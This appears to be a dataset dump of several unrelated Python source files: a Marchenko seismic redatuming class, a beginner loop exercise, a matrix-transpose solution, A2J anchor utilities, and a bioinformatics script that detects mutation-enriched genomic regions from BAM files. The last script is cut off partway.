np.fft.irfft(direct, nfft, axis=0) / dt\n direct = np.real(direct[:nt])\n return direct\n\n\nclass Marchenko():\n r\"\"\"Marchenko redatuming\n\n Solve multi-dimensional Marchenko redatuming problem using\n :py:func:`scipy.sparse.linalg.lsqr` iterative solver.\n\n Parameters\n ----------\n R : :obj:`numpy.ndarray`\n Multi-dimensional reflection response in time or frequency\n domain of size :math:`[n_s \\times n_r \\times n_t/n_{fmax}]`\n R1 : :obj:`bool`, optional\n Complex conjugate multi-dimensional reflection response\n in frequency domain (if ``None``, ``R`` must be in time)\n dt : :obj:`float`, optional\n Sampling of time integration axis\n nt : :obj:`float`, optional\n Number of samples in time (not required if ``R`` is in time)\n dr : :obj:`float`, optional\n Sampling of receiver integration axis\n nfmax : :obj:`int`, optional\n Index of max frequency to include in deconvolution process\n wav : :obj:`numpy.ndarray`, optional\n Wavelet to apply to direct arrival when created using ``trav``\n toff : :obj:`float`, optional\n Time-offset to apply to traveltime\n nsmooth : :obj:`int`, optional\n Number of samples of smoothing operator to apply to window\n dtype : :obj:`bool`, optional\n Type of elements in input array.\n\n Attributes\n ----------\n ns : :obj:`int`\n Number of samples along source axis\n nr : :obj:`int`\n Number of samples along receiver axis\n shape : :obj:`tuple`\n Operator shape\n explicit : :obj:`bool`\n Operator contains a matrix that can be solved explicitly\n (True) or not (False)\n\n Raises\n ------\n TypeError\n If ``t`` is not :obj:`numpy.ndarray`.\n\n See Also\n --------\n MDC : Multi-dimensional convolution\n MDD : Multi-dimensional deconvolution\n\n Notes\n -----\n Marchenko redatuming is a method that allows to produce correct\n subsurface-to-surface responses given the availability of a\n reflection data and a macro-velocity model [1]_.\n\n The Marchenko equations can be written in a compact matrix\n form [2]_ and solved by means of iterative solvers such as LSQR:\n\n .. math::\n \\begin{bmatrix}\n \\Theta \\mathbf{R} \\mathbf{f_d^+} \\\\\n \\mathbf{0}\n \\end{bmatrix} =\n \\mathbf{I} -\n \\begin{bmatrix}\n \\mathbf{0} & \\Theta \\mathbf{R} \\\\\n \\Theta \\mathbf{R^*} & \\mathbf{0}\n \\end{bmatrix}\n \\begin{bmatrix}\n \\mathbf{f^-} \\\\\n \\mathbf{f_m^+}\n \\end{bmatrix}\n\n Finally the subsurface Green's functions can be obtained applying the\n following operator to the retrieved focusing functions\n\n .. math::\n \\begin{bmatrix}\n -\\mathbf{g^-} \\\\\n \\mathbf{g^{+ *}}\n \\end{bmatrix} =\n \\mathbf{I} -\n \\begin{bmatrix}\n \\mathbf{0} & \\mathbf{R} \\\\\n \\mathbf{R^*} & \\mathbf{0}\n \\end{bmatrix}\n \\begin{bmatrix}\n \\mathbf{f^-} \\\\\n \\mathbf{f^+}\n \\end{bmatrix}\n\n .. [1] Wapenaar, K., Thorbecke, J., Van der Neut, J., Broggini, F.,\n Slob, E., and Snieder, R., \"Marchenko imaging\", Geophysics, vol. 79,\n pp. WA39-WA57. 2014.\n\n .. [2] van der Neut, J., Vasconcelos, I., and Wapenaar, K. \"On Green's\n function retrieval by iterative substitution of the coupled\n Marchenko equations\", Geophysical Journal International, vol. 203,\n pp. 792-813. 2015.\n\n \"\"\"\n def __init__(self, R, R1=None, dt=0.004, nt=None, dr=1.,\n nfmax=None, wav=None, toff=0.0, nsmooth=10,\n dtype='float64'):\n # Save inputs into class\n self.dt = dt\n self.dr = dr\n self.wav = wav\n self.toff = toff\n self.nsmooth = nsmooth\n self.dtype = dtype\n self.explicit = False\n\n # Infer dimensions of R\n if R1 is None:\n self.ns, self.nr, self.nt = R.shape\n self.nfmax = nfmax\n else:\n self.ns, self.nr, self.nfmax = R.shape\n self.nt = nt\n if nt is None:\n logging.error('nt must be provided as R is in frequency')\n self.nt2 = int(2*self.nt-1)\n self.t = np.arange(self.nt)*self.dt\n\n # Fix nfmax to be at maximum equal to half of the size of fft samples\n if self.nfmax is None or self.nfmax > np.ceil((self.nt2 + 1) / 2):\n self.nfmax = int(np.ceil((self.nt2+1)/2))\n logging.warning('nfmax set equal to (nt+1)/2=%d', self.nfmax)\n\n # Add negative time to reflection data and convert to frequency\n if R1 is None:\n Rtwosided = np.concatenate((np.zeros((self.ns, self.nr,\n self.nt - 1)), R), axis=-1)\n R1twosided = np.concatenate((np.flip(R, axis=-1),\n np.zeros((self.ns, self.nr,\n self.nt - 1))), axis=-1)\n\n Rtwosided_fft = np.fft.rfft(Rtwosided, self.nt2,\n axis=-1) / np.sqrt(self.nt2)\n self.Rtwosided_fft = Rtwosided_fft[..., :nfmax]\n R1twosided_fft = np.fft.rfft(R1twosided, self.nt2,\n axis=-1) / np.sqrt(self.nt2)\n self.R1twosided_fft = R1twosided_fft[..., :nfmax]\n else:\n self.Rtwosided_fft = R\n self.R1twosided_fft = R1\n\n\n def apply_onepoint(self, trav, G0=None, nfft=None, rtm=False, greens=False,\n dottest=False, fast=True, **kwargs_lsqr):\n r\"\"\"Marchenko redatuming for one point\n\n Solve the Marchenko redatuming inverse problem for a single point\n given its direct arrival traveltime curve (``trav``)\n and waveform (``G0``).\n\n Parameters\n ----------\n trav : :obj:`numpy.ndarray`\n Traveltime of first arrival from subsurface point to\n surface receivers of size :math:`[n_r \\times 1]`\n G0 : :obj:`numpy.ndarray`, optional\n Direct arrival in time domain of size :math:`[n_r \\times n_t]`\n (if None, create arrival using ``trav``)\n nfft : :obj:`int`, optional\n Number of samples in fft when creating the analytical direct wave\n rtm : :obj:`bool`, optional\n Compute and return rtm redatuming\n greens : :obj:`bool`, optional\n Compute and return Green's functions\n dottest : :obj:`bool`, optional\n Apply dot-test\n fast : :obj:`bool`\n Fast application of MDC when model has only one virtual source\n (``True``) or not (``False``)\n **kwargs_lsqr\n Arbitrary keyword arguments for\n :py:func:`scipy.sparse.linalg.lsqr` solver\n\n Returns\n ----------\n f1_inv_minus : :obj:`numpy.ndarray`\n Inverted upgoing focusing function of size :math:`[n_r \\times n_t]`\n f1_inv_plus : :obj:`numpy.ndarray`\n Inverted downgoing focusing function\n of size :math:`[n_r \\times n_t]`\n p0_minus : :obj:`numpy.ndarray`\n Single-scattering standard redatuming upgoing Green's function of\n size :math:`[n_r \\times n_t]`\n g_inv_minus : :obj:`numpy.ndarray`\n Inverted upgoing Green's function of size :math:`[n_r \\times n_t]`\n g_inv_plus : :obj:`numpy.ndarray`\n Inverted downgoing Green's function\n of size :math:`[n_r \\times n_t]`\n\n \"\"\"\n # Create window\n trav_off = trav - self.toff\n trav_off = np.round(trav_off / self.dt).astype(np.int)\n\n # window\n w = np.zeros((self.nr, self.nt))\n for ir in range(self.nr):\n w[ir, :trav_off[ir]] = 1\n w = np.hstack((np.fliplr(w), w[:, 1:]))\n if self.nsmooth > 0:\n smooth = np.ones(self.nsmooth) / self.nsmooth\n w = filtfilt(smooth, 1, w)\n\n # Create operators\n Rop = MDC(self.Rtwosided_fft, self.nt2, nv=1, dt=self.dt, dr=self.dr,\n twosided=True, fast=fast, dtype=self.dtype)\n R1op = MDC(self.R1twosided_fft, self.nt2, nv=1, dt=self.dt, dr=self.dr,\n twosided=True, fast=fast, dtype=self.dtype)\n Wop = Diagonal(w.flatten())\n Iop = Identity(self.nr * (2*self.nt-1))\n Mop = Block([[Iop, -1 * Wop * Rop],\n [-1 * Wop * R1op, Iop]]) * BlockDiag([Wop, Wop])\n Gop = Block([[Iop, -1 * Rop],\n [-1 * R1op, Iop]])\n\n if dottest:\n Dottest(Gop, 2 * self.nr * self.nt2,\n 2 * self.nr * self.nt2,\n raiseerror=True, verb=True)\n if dottest:\n Dottest(Mop, 2 * self.nr * self.nt2,\n 2 * self.nr * self.nt2,\n raiseerror=True, verb=True)\n\n # Create input focusing function\n if G0 is None:\n if self.wav is not None and nfft is not None:\n G0 = (directwave(self.wav, trav, self.nt,\n self.dt, nfft=nfft)).T\n else:\n logging.error('wav and/or nfft are not provided. '\n 'Provide either G0 or wav and nfft...')\n raise ValueError('wav and/or nfft are not provided. '\n 'Provide either G0 or wav and nfft...')\n\n fd_plus = np.concatenate((np.fliplr(G0),\n np.zeros((self.nr, self.nt - 1))), axis=-1)\n\n # Run standard redatuming as benchmark\n if rtm:\n p0_minus = Rop * fd_plus.flatten()\n p0_minus = p0_minus.reshape(self.nr, self.nt2)\n\n # Create data and inverse focusing functions\n d = Wop * Rop * fd_plus.flatten()\n d = np.concatenate((d.reshape(self.nr, self.nt2),\n np.zeros((self.nr, self.nt2))))\n\n # Invert for focusing functions\n f1_inv = lsqr(Mop, d.flatten(), **kwargs_lsqr)[0]\n f1_inv = f1_inv.reshape(2 * self.nr, self.nt2)\n f1_inv_tot = f1_inv + np.concatenate((np.zeros((self.nr, self.nt2)),\n fd_plus))\n f1_inv_minus, f1_inv_plus = f1_inv_tot[:self.nr], f1_inv_tot[self.nr:]\n\n if greens:\n # Create Green's functions\n g_inv = Gop * f1_inv_tot.flatten()\n g_inv = np.real(g_inv) # cast to real as Gop is a complex operator\n g_inv = g_inv.reshape(2 * self.nr, (2 * self.nt - 1))\n g_inv_minus, g_inv_plus = -g_inv[:self.nr], \\\n np.fliplr(g_inv[self.nr:])\n\n if rtm and greens:\n return f1_inv_minus, f1_inv_plus, p0_minus, g_inv_minus, g_inv_plus\n elif rtm:\n return f1_inv_minus, f1_inv_plus, p0_minus\n elif greens:\n return f1_inv_minus, f1_inv_plus, g_inv_minus, g_inv_plus\n else:\n return f1_inv_minus, f1_inv_plus\n\n\n def apply_multiplepoints(self, trav, G0=None, nfft=None,\n rtm=False, greens=False,\n dottest=False, **kwargs_lsqr):\n r\"\"\"Marchenko redatuming for multiple points\n\n Solve the Marchenko redatuming inverse problem for multiple\n points given their direct arrival traveltime curves (``trav``)\n and waveforms (``G0``).\n\n Parameters\n ----------\n trav : :obj:`numpy.ndarray`\n Traveltime of first arrival from subsurface points to\n surface receivers of size :math:`[n_r \\times n_{vs}]`\n G0 : :obj:`numpy.ndarray`, optional\n Direct arrival in time domain of size\n :math:`[n_r \\times n_{vs} \\times n_t]` (if None, create arrival\n using ``trav``)\n nfft : :obj:`int`, optional\n Number of samples in fft when creating the analytical direct wave\n rtm : :obj:`bool`, optional\n Compute and return rtm redatuming\n greens : :obj:`bool`, optional\n Compute and return Green's functions\n dottest : :obj:`bool`, optional\n Apply dot-test\n **kwargs_lsqr\n Arbitrary keyword arguments\n for :py:func:`scipy.sparse.linalg.lsqr` solver\n\n Returns\n ----------\n f1_inv_minus : :obj:`numpy.ndarray`\n Inverted upgoing focusing function of size\n :math:`[n_r \\times n_{vs} \\times n_t]`\n f1_inv_plus : :obj:`numpy.ndarray`\n Inverted downgoing focusing functionof size\n :math:`[n_r \\times n_{vs} \\times n_t]`\n p0_minus : :obj:`numpy.ndarray`\n Single-scattering standard redatuming upgoing Green's function\n of size :math:`[n_r \\times n_{vs} \\times n_t]`\n g_inv_minus : :obj:`numpy.ndarray`\n Inverted upgoing Green's function of size\n :math:`[n_r \\times n_{vs} \\times n_t]`\n g_inv_plus : :obj:`numpy.ndarray`\n Inverted downgoing Green's function of size\n :math:`[n_r \\times n_{vs} \\times n_t]`\n\n \"\"\"\n nvs = trav.shape[1]\n # Create window\n trav_off = trav - self.toff\n trav_off = np.round(trav_off / self.dt).astype(np.int)\n\n w = np.zeros((self.nr, nvs, self.nt))\n for ir in range(self.nr):\n for ivs in range(nvs):\n w[ir, ivs, :trav_off[ir, ivs]] = 1\n w = np.concatenate((np.flip(w, axis=-1), w[:, :, 1:]), axis=-1)\n if self.nsmooth > 0:\n smooth = np.ones(self.nsmooth) / self.nsmooth\n w = filtfilt(smooth, 1, w)\n\n # Create operators\n Rop = MDC(self.Rtwosided_fft, self.nt2, nv=nvs,\n dt=self.dt, dr=self.dr, twosided=True, dtype=self.dtype)\n R1op = MDC(self.R1twosided_fft, self.nt2, nv=nvs,\n dt=self.dt, dr=self.dr, twosided=True, dtype=self.dtype)\n Wop = Diagonal(w.flatten())\n Iop = Identity(self.nr * nvs * (2*self.nt-1))\n Mop = Block([[Iop, -1 * Wop * Rop],\n [-1 * Wop * R1op, Iop]]) * BlockDiag([Wop, Wop])\n Gop = Block([[Iop, -1 * Rop],\n [-1 * R1op, Iop]])\n\n if dottest:\n Dottest(Gop, 2 * self.nr * nvs * self.nt2,\n 2 * self.nr * nvs * self.nt2,\n raiseerror=True, verb=True)\n if dottest:\n Dottest(Mop, 2 * self.nr * nvs * self.nt2,\n 2 * self.nr * nvs * self.nt2,\n raiseerror=True, verb=True)\n\n # Create input focusing function\n if G0 is None:\n if self.wav is not None and nfft is not None:\n G0 = np.zeros((self.nr, nvs, self.nt))\n for ivs in range(nvs):\n G0[:, ivs] = (directwave(self.wav, trav[:, ivs],\n self.nt, self.dt, nfft=nfft)).T\n else:\n logging.error('wav and/or nfft are not provided. '\n 'Provide either G0 or wav and nfft...')\n raise ValueError('wav and/or nfft are not provided. '\n 'Provide either G0 or wav and nfft...')\n\n fd_plus = np.concatenate((np.flip(G0, axis=-1),\n np.zeros((self.nr, nvs,\n self.nt - 1))), axis=-1)\n\n # Run standard redatuming as benchmark\n if rtm:\n p0_minus = Rop * fd_plus.flatten()\n p0_minus = p0_minus.reshape(self.nr, nvs, self.nt2)\n\n # Create data and inverse focusing functions\n d = Wop * Rop * fd_plus.flatten()\n d = np.concatenate((d.reshape(self.nr, nvs, self.nt2),\n np.zeros((self.nr, nvs, self.nt2))))\n\n # Invert for focusing functions\n f1_inv = lsqr(Mop, d.flatten(), **kwargs_lsqr)[0]\n f1_inv = f1_inv.reshape(2 * self.nr, nvs, self.nt2)\n f1_inv_tot = f1_inv + np.concatenate((np.zeros((self.nr, nvs,\n 2 * self.nt - 1)),\n fd_plus))\n f1_inv_minus, f1_inv_plus = f1_inv_tot[:self.nr], f1_inv_tot[self.nr:]\n\n if greens:\n # Create Green's functions\n g_inv = Gop * f1_inv_tot.flatten()\n g_inv = np.real(g_inv) # cast to real as Gop is a complex operator\n g_inv = g_inv.reshape(2 * self.nr, nvs, (2 * self.nt - 1))\n g_inv_minus, g_inv_plus = -g_inv[:self.nr], \\\n np.flip(g_inv[self.nr:], axis=-1)\n\n if rtm and greens:\n return f1_inv_minus, f1_inv_plus, p0_minus, g_inv_minus, g_inv_plus\n elif rtm:\n return f1_inv_minus, f1_inv_plus, p0_minus\n elif greens:\n return f1_inv_minus, f1_inv_plus, g_inv_minus, g_inv_plus\n else:\n return f1_inv_minus, f1_inv_plus\n","sub_path":"developement/marchenko_old.py","file_name":"marchenko_old.py","file_ext":"py","file_size_in_byte":18916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"603177056","text":"# Write your solution for 1.1 here!\ns=0\nfor i in range(101):\n\ts=s+i\nprint(s)\n\ns2=0\nfor j in range(0,101,2):\n\ts2=s2+j\nprint(s2)\n","sub_path":"exercises/for_loops.py","file_name":"for_loops.py","file_ext":"py","file_size_in_byte":127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"46909220","text":"\"\"\"\nGiven a matrix A, return the transpose of A.\n\nThe transpose of a matrix is the matrix flipped over it's main diagonal,\nswitching the row and column indices of the matrix.\n\"\"\"\nclass Solution(object):\n def transpose(self, A):\n \"\"\"\n :type A: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n m = len(A)\n n = len(A[0])\n B = [[0 for _ in range(m)] for _ in range(n)]\n\n for i in range(n):\n for j in range(m):\n if i == j:\n B[i][j] = A[i][j]\n else:\n B[i][j] = A[j][i]\n\n return B\n\n def transpose2(self, A):\n return zip(*A)\n\n\nA = [[1,2,3],[4,5,6],[7,8,9]]\nprint(Solution().transpose(A))","sub_path":"867TranspMat.py","file_name":"867TranspMat.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"433009354","text":"\nimport os\nimport sys\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# PROJ ROOT DIR\nDIR_PATH = os.path.dirname(os.path.abspath(__file__)) # a2j_utilities\nA2J_PATH = os.path.join(DIR_PATH, os.path.pardir) # A2J\nMODEL_PATH = os.path.join(A2J_PATH, os.path.pardir) # model\nROOT_PATH = os.path.join(MODEL_PATH, os.path.pardir) # root\nsys.path.append(ROOT_PATH)\n\n# Import Project Libraries\nimport pipeline.constants as const\n\n\n\ndef generate_anchors(p_h=None, p_w=None):\n \"\"\"\n Generate anchor shape\n\n :param p_h: anchor hieght layout\n :param p_w: anchor width layout\n \"\"\"\n if p_h is None:\n p_h = np.array([2, 6, 10, 14])\n \n if p_w is None:\n p_w = np.array([2, 6, 10, 14])\n \n num_anchors = len(p_h) * len(p_w)\n\n # Initialize the anchor points\n k = 0\n anchors = np.zeros((num_anchors, 2))\n for i in range(len(p_w)):\n for j in range(len(p_h)):\n anchors[k,1] = p_w[j]\n anchors[k,0] = p_h[i]\n k += 1\n return anchors\n\ndef shift(shape, stride, anchor):\n \"\"\"\n Create the locations of all the anchonrs in the in put image\n\n :param shape: common trunk (H, W)\n :param stride: the downsampling factor from input to common trunk\n :param anchor: anchor \n \"\"\"\n shift_h = np.arange(0, shape[0]) * stride # (shape[0]) 10\n shift_w = np.arange(0, shape[1]) * stride # (shape[1]) 9\n\n shift_h, shift_w = np.meshgrid(shift_h, shift_w) # (shape[1], shape[0]) (9, 10), (shape[1], shape[0]) (9, 10)\n shifts = np.vstack( (shift_h.ravel(), shift_w.ravel()) ).transpose() # (shape[0]*shape[1], 2) (90, 2)\n\n A = anchor.shape[0] # 16\n K = shifts.shape[0] # (shape[0]*shape[1]) (90)\n\n all_anchors = (anchor.reshape(1,A,2) + shifts.reshape((1, K, 2)).transpose((1, 0, 2))) # (shape[0]*shape[1], A, 2)\n all_anchors = all_anchors.reshape((K*A, 2)) # (shape[0]*shape[1]*A, 2)\n return all_anchors\n","sub_path":"model/A2J/a2j_utilities/a2j_utils.py","file_name":"a2j_utils.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"281658447","text":"#! /Users/meng/menghw_HD/anaconda2/bin/python\n# #! /gpfs/user/menghaowei/anaconda2/bin/python\n# _*_ coding: UTF-8 _*_\n\n# Version information START --------------------------------------------------\nVERSION_INFO = \\\n\"\"\"\nAuthor: MENG Howard\n\nVersion-01:\n 2019-12-30\n Input ctrl json and treat json respectiv\n\n 2019-12-29\n Fix output part \n\n 2019-12-28 \n Find significant mpmat signal\n\nE-Mail: meng_howard@126.com\n\"\"\"\n# Version information END ----------------------------------------------------\n\n\n# Learning Part START --------------------------------------------------------\nLEARNING_PART = \\\n\"\"\"\n\nDesign pipeline:\n\nInput:\n 1. ctrl_BAM treat_BAM\n 2. efficient genome size \n 3. mpmat region \n 4. reference\n 5. mut_type_list\n 6. mut_num_cutoff\n\nOutput:\n 1. scale factor on each chromosome\n 2. region raw mutant reads \n 3. region raw non-mutant reads \n 4. region fix mutant reads \n 5. region fix non-mutant reads\n 6. log2FoldChange \n 7. pvalue \n 8. qvalue \n\n\"\"\"\n# Learning Part END-----------------------------------------------------------\n\n\nimport argparse\nimport os\nimport sys\n\nimport random\nimport string\nimport time\nimport json\n\nimport pysam \nfrom Bio import SeqIO\n\nfrom scipy import stats\nimport statsmodels.stats.multitest as multi\nimport numpy as np\nimport math\n\nfrom DetectSeqLib.FindMutRegion import *\n\n###############################################################################\n# function part \n###############################################################################\ndef _count_dict_sum_up(count_dict, key_ref_name_list=\"All\", ignore_key_list = [\"total\"]):\n \"\"\"\n INPUT \n \n key = chr1, chr2, chr3 ...\n value = dict and key is \n \n non_mut_align_count\n all_align_count\n total_high_mismatch_count\n query_high_mismatch_count\n mut_align_count\n other_high_mismatch_coun\n all_filter_count\n \n \n use those key to sum up and count \n \n \n ignore \n \n RETURN \n Dict like and add 'total' key\n \"\"\"\n \n if key_ref_name_list == \"All\":\n key_ref_name_list = count_dict.keys()\n \n total_dict = {}\n inner_key_list = count_dict[key_ref_name_list[0]].keys()\n\n for inner_key in inner_key_list:\n total_dict[inner_key] = 0\n\n for ref_key in key_ref_name_list:\n if ref_key not in ignore_key_list:\n for ref_inner_key in inner_key_list:\n total_dict[ref_inner_key] += count_dict[ref_key][ref_inner_key]\n \n count_dict[\"total\"] = total_dict.copy()\n \n return(count_dict)\n\n\ndef _calculate_scale_dict(meta_data_dict, to_large_state = False, scale_reads_count=None):\n \"\"\"\n INPUT:\n \n A dict generated from raw BAM file, and data structure like\n meta_count_dict = {\n \"meta_data\" : {\n \"create_date\" : ,\n \"ctrl_BAM\" : ,\n \"treat_BAM\" : ,\n \"reference\" : ,\n \"threads\" : ,\n \"query_mutation_type\" : ,\n \"query_mutation_min_cutoff\" : ,\n \"query_mutation_max_cutoff\" : ,\n \"other_mismatch_max_cutoff\" : ,\n \"total_mismatch_max_cutoff\" : ,\n \"filter_log\" : \n },\n \"ctrl\" : ,\n \"treat\" : ,\n }\n \n \n Default is False\n Means scale the larger sample up to the smaller sample. \n Usually, scaling down will bring down background noise, which is good for enrichment detection.\n \n RETURN:\n \n \n \n INFO:\n Final changes, 2019-12-29\n \"\"\"\n \n # set dict\n scale_dict = {\"ctrl\" : {}, \"treat\" : {}}\n \n select_key_list = [\n \"all_align_count\",\n \"mut_align_count\",\n \"non_mut_align_count\"\n ]\n \n if scale_reads_count != None:\n ctrl_total_scale = (meta_data_dict[\"ctrl\"][\"total\"][\"all_align_count\"]) / 1.0 / int(scale_reads_count) \n treat_total_scale = (meta_data_dict[\"treat\"][\"total\"][\"all_align_count\"]) / 1.0 / int(scale_reads_count) \n \n for ref_name in meta_data_dict[\"ctrl\"].keys():\n # make dict \n if scale_dict[\"ctrl\"].get(ref_name) == None:\n scale_dict[\"ctrl\"][ref_name] = {}\n\n if scale_dict[\"treat\"].get(ref_name) == None:\n scale_dict[\"treat\"][ref_name] = {}\n \n for key in meta_data_dict[\"ctrl\"][ref_name].keys():\n ctrl_count = meta_data_dict[\"ctrl\"][ref_name][key]\n treat_count = meta_data_dict[\"treat\"][ref_name][key]\n \n if scale_reads_count == None:\n if to_large_state:\n scale_value = max(ctrl_count, treat_count)\n else:\n scale_value = min(ctrl_count, treat_count)\n\n if scale_value == 0:\n ctrl_scale_factor = None\n treat_scale_factor = None\n else:\n ctrl_scale_factor = ctrl_count / 1.0 / scale_value\n treat_scale_factor = treat_count / 1.0 / scale_value\n else:\n ctrl_scale_factor = ctrl_total_scale\n treat_scale_factor = treat_total_scale\n \n # make new dict key\n if key in select_key_list:\n scale_dict_key = key + \".scale_factor\"\n scale_dict[\"ctrl\"][ref_name][scale_dict_key] = ctrl_scale_factor\n scale_dict[\"treat\"][ref_name][scale_dict_key] = treat_scale_factor\n\n # return part \n return scale_dict\n \n\n###############################################################################\n# read parameters\n###############################################################################\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description=\"A tool to find significant enrichment mpmat region\")\n\n parser.add_argument(\"-i\", \"--mpmat_table\",\n help=\".mpmat table, which can be generated from code\",required=True)\n\n parser.add_argument(\"-c\", \"--ctrl_BAM\",\n help=\"Control BAM file\",required=True)\n\n parser.add_argument(\"-t\", \"--treat_BAM\",\n help=\"Treatment BAM file\",required=True)\n\n parser.add_argument(\"-r\", \"--reference\",\n help=\"Genome FASTA file\",required=True)\n\n parser.add_argument(\"-g\", \"--genome_effective_json\",\n help=\"Genome effective sequence information in .json format, can be generated from script \",required=True)\n\n parser.add_argument(\"-m\", \"--ctrl_BAM_json\",\n help=\"Ctrl BAM json, meta data information in .json format, generated from \",required=True)\n\n parser.add_argument(\"-n\", \"--treat_BAM_json\",\n help=\"Treat BAM json, meta data information in .json format, generated from \",required=True)\n\n parser.add_argument(\"-o\", \"--output\",\n help=\"Output file, default=stdout\",default=\"stdout\")\n\n parser.add_argument(\"--region_mutation_min_cutoff\",\n help=\"No less than this cutoff consider as a region mutant read, default=1\",default=1, type=int) \n\n parser.add_argument(\"--query_mutation_type\",\n help=\"Reads mutation type, which considered contain useful information, default=CT,GA\",default=\"CT,GA\")\n\n parser.add_argument(\"--query_mutation_min_cutoff\",\n help=\"An alignment contain mutation number lower than this, considered as 'non_mut_align', or as 'mut_align', default=2\",default=2, type=int)\n\n parser.add_argument(\"--query_mutation_max_cutoff\",\n help=\"An alignment contain mutation number higher than this, considered as 'query_high_mismatch', which often caused by Bismark mapping error, default=16\",default=16, type=int)\n\n parser.add_argument(\"--other_mutation_max_cutoff\",\n help=\"An alignment contain mutation number higher than this, considered as 'other_high_mismatch', default=12\",default=12, type=int)\n\n parser.add_argument(\"--total_mutation_max_cutoff\",\n help=\"An alignment contain mutation number higher than this, considered as 'total_high_mismatch', default=24\",default=24, type=int)\n\n parser.add_argument(\"--to_large\",\n help=\"Means scale the larger sample up to the smaller sample. Usually, \\\n scaling down will bring down background noise, \\\n which is good for enrichment detection. default=False\",default=False, type=bool)\n\n parser.add_argument(\"--scale_reads_count\",\n help=\"Scaled final output region signal, default=100e6 Usually, default=100e6\",default=int(100e6), type=int)\n\n parser.add_argument(\"--mpmat_header\",\n help=\"If set True, means mpmat table contain header line, default=False\",default=False, type=bool)\n\n parser.add_argument(\"--lambda_method\",\n help=\"Can be set as 'ctrl_max', 'treat_max', 'max', default=ctrl_max\",default=\"ctrl_max\")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load the paramters\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n ARGS = parser.parse_args()\n\n mpmat_filename = ARGS.mpmat_table\n ctrl_bam_filename = ARGS.ctrl_BAM\n treat_bam_filename = ARGS.treat_BAM\n \n query_mut_type_list = ARGS.query_mutation_type.split(\",\")\n region_mut_min_cutoff = ARGS.region_mutation_min_cutoff\n query_mut_min_cutoff = ARGS.query_mutation_min_cutoff\n query_mut_max_cutoff = ARGS.query_mutation_max_cutoff\n other_mut_max_cutoff = ARGS.other_mutation_max_cutoff\n total_mut_max_cutoff = ARGS.total_mutation_max_cutoff\n \n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # make full cmd\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n full_cmd_str = \"python find-significant-mpmat.py \\n \\\n --mpmat_table {mpmat_table} \\n \\\n --ctrl_BAM {ctrl_BAM} \\n \\\n --treat_BAM {treat_BAM} \\n \\\n --reference {reference} \\n \\\n --genome_effective_json {genome_effective_json} \\n \\\n --ctrl_BAM_json {ctrl_BAM_json} \\n \\\n --treat_BAM_json {treat_BAM_json} \\n \\\n --output {output} \\n \\\n --query_mutation_type {query_mutation_type} \\n \\\n --region_mutation_min_cutoff {region_mutation_min_cutoff} \\n \\\n --query_mutation_min_cutoff {query_mutation_min_cutoff} \\n \\\n --query_mutation_max_cutoff {query_mutation_max_cutoff} \\n \\\n --other_mutation_max_cutoff {other_mutation_max_cutoff} \\n \\\n --total_mutation_max_cutoff {total_mutation_max_cutoff} \\n \\\n --scale_reads_count {scale_reads_count} \\n \\\n --lambda_method {lambda_method} \\n \\\n --mpmat_header {mpmat_header} \\\n \".format(\n mpmat_table = ARGS.mpmat_table,\n ctrl_BAM = ARGS.ctrl_BAM,\n treat_BAM = ARGS.treat_BAM,\n reference = ARGS.reference,\n genome_effective_json = ARGS.genome_effective_json,\n ctrl_BAM_json = ARGS.ctrl_BAM_json,\n treat_BAM_json = ARGS.treat_BAM_json,\n output = ARGS.output,\n query_mutation_type = ARGS.query_mutation_type,\n region_mutation_min_cutoff = ARGS.region_mutation_min_cutoff,\n query_mutation_min_cutoff = ARGS.query_mutation_min_cutoff,\n query_mutation_max_cutoff = ARGS.query_mutation_max_cutoff,\n other_mutation_max_cutoff = ARGS.other_mutation_max_cutoff,\n total_mutation_max_cutoff = ARGS.total_mutation_max_cutoff,\n scale_reads_count = ARGS.scale_reads_count,\n lambda_method = ARGS.lambda_method,\n mpmat_header = ARGS.mpmat_header\n )\n\n sys.stderr.write(\"\\n\" + \"-\" * 80 + \"\\n\")\n sys.stderr.write(full_cmd_str)\n sys.stderr.write(\"\\n\" + \"-\" * 80 + \"\\n\")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # check input bam file\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n check_res = check_input_bam_file(ctrl_bam_filename)\n\n if check_res == 1:\n raise IOError(\"BAM not exisit!\")\n\n elif check_res == 2:\n raise IOError(\"BAM not sorted by coordinate!\")\n\n elif check_res == 3:\n raise IOError(\"BAM doesn't contain index file!\")\n\n\n check_res = check_input_bam_file(treat_bam_filename)\n\n if check_res == 1:\n raise IOError(\"BAM not exisit!\")\n\n elif check_res == 2:\n raise IOError(\"BAM not sorted by coordinate!\")\n\n elif check_res == 3:\n raise IOError(\"BAM doesn't contain index file!\")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # check other file exist\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n if not os.path.exists(ARGS.mpmat_table):\n raise IOError(\"--mpmat_table does not exist! \")\n\n if not 